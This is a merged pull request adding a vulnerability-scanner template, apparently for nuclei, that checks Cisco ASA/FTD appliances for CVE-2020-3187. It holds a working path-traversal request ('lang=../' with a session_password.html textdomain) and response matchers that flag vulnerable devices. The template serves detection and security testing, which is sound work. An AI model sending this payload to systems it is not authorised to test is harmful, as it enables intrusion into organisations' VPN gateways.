Merge pull request #259 from v1ll41n/CVE-2020-3187-template

Adding Cisco ASA/FTD Unauthenticated Arbitrary File Deletion - CVE-20…

cves/CVE-2020-3187.yaml

@@ -0,0 +1,19 @@
+id: CVE-2020-3187
+
+# Reference: https://twitter.com/aboul3la/status/1286809567989575685
+
+info:
+  name: CVE-2020-3187
+  author: KareemSe1im
+  severity: High
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session_password.html&default-language&lang=../"
+    matchers:
+      - type: word
+        words:
+          - "/+CSCOE+/session_password.html"
+          - "GET_OUT_RESOURCE"
+        condition: and